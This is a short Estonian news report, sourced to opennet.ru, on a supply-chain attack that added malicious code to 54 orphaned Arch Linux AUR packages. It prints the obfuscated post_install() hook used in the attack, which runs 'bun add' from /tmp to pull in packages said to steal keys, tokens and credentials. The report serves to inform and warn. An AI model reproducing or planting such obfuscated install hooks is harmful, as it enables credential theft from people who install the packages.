Kuigi Arch Linuxi arendajad on astunud samme, et peatada kahjuliku koodi sissetoomine AUR (Arch User Repository) hoidlastesse, ei ole tegevus peatunud. Mõni tund tagasi lisati kahjulik kood veel 54 paketti, mis jäävad ilma hooldajateta (kahjulike muudatuste tühistamise ajalugu). Erinevalt üle-eelsetest rünnakutest, kus kasutati npm-i pakettide haldurit, on seekord kaasatud bun platvorm kahjulike sõltuvuste paigaldamiseks. Rakenduse post_install funktsiooni lisatakse obfuskeeritud rida, mis kutsub esile käsu „bun add“, et paigaldada pakette, mis sisaldavad kahjulikku koodi, mis skaneerib ja saadab välisse server võtmeid, tokeneid ja kontoandmeid.
post_install() {
$’\x63′»d» «/»‘t'»m»‘p’ && «b»‘u»n’ ‘a'»d»‘d’ $’\141\x6e»s'»i»»-«$’\143»o»l»o»r’$’\x73′ ‘n'»e»‘x'»t»»f»‘i»l»e»-»j»s’
}
Allikas: opennet.ru
